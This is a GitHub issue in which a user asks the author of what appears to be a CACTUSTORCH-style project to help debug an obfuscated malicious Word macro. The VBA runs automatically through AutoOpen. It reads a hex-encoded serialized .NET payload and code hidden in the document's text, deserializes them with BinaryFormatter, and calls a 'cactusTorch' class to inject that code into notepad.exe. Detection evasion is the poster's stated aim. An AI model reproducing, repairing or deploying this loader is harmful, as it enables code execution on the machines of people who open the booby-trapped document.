Deserialization error #6
Description
Hi Vincent,
Thanks for this awesome project. I'm trying to obfuscate the script a bit by extracting the code and serialized_obj variables from the text in the Word document. All the rest of the code is the same as your original code. All the variables seem to populate correctly, however, at Set d = fmt.Deserialize_2(stm) I'm getting the error:
Apparently it can't deserialize the binary.
I wouldn't normally reach out to you for such issues, but I've been pulling hair out of my head out of frustration. Hope you can identify the issue. Thanks a lot in advance!
Public binary As String
Public code As String
Sub Init()
binary = "notepad.exe"
code = getText("AAAAAA")
End Sub
Private Function getText(id)
Dim res As String
Dim par As String
Dim i As Long
iParCount = ActiveDocument.Paragraphs.Count
For J = 1 To iParCount
par = ActiveDocument.Paragraphs(J).Range.Text
If InStr(par, id) Then
res = par
End If
Next J
getText = res
End Function
Private Function decodeHex(hex)
On Error Resume Next
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.dataType = "bin.hex"
EL.Text = hex
decodeHex = EL.nodeTypedValue
End Function
Function Run()
Dim entry_class, serialized_obj
entry_class = "cactusTorch"
Dim stm As Object, fmt As Object, al As Object
Set stm = CreateObject("System.IO.MemoryStream")
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
serialized_obj = getText("00000000000")
' serialized_obj = "0001000000FFFFF..."
MsgBox Len(serialized_obj)
' Len(serialized_obj) = 17957
Dim dec
dec = decodeHex(serialized_obj)
For Each i In dec
stm.WriteByte i
Next i
stm.Position = 0
Dim n As Object, d As Object, o As Object
Set n = fmt.SurrogateSelector
Set d = fmt.Deserialize_2(stm)
al.Add n
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.flame binary, code
End Function
Sub AutoOpen()
Init
Run
End Sub